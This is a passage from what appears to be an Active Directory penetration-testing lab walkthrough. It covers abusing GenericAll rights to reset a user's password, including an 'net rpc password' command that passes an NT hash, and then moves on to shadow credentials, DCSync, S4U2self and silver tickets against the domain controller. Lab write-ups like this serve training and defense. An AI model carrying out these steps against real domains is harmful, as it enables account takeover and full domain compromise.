Generic all on user (CentralPark -> diego.Montenegro)
Now Nicolas.Maduro is in CentralPark so we can take the control of diego.Montenegro with the genericAll on diego.Montenegro
let’s change diego.Montenegro password with ldeep
net rpc password diego.Montenegro --pw-nt-hash -U NewYork.local/Nicolas.Maduro%b3b3717f7d51b37fb325f7e7d048e998 -S NYC.Newyork.localWe will set the password
letsdothis
GenericAll on Computer (diego.Montenegro-> NYC)
Now we own diego.Montenegro, let’s finish the domain with the generic Write on the DC
We already done that on the previous chapter.
But what if you can’t add a computer in the domain (more and more customers disable the ability for a simple user to add computer to the domains and this is a good practice from a security point of view), you can do a shadow credentials attack on the computer.
So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the target account.
Shadow credentials is now include with certipy (this attack can also be done with pywisker )
Now we got the tgt and the NT hash of NYC$
Obviously we can do a dcsync because NYC is a DC, but instead let’s try to directly get a shell
To do that the easiest way is using s4u2self abuse or create a silver ticket
Last updated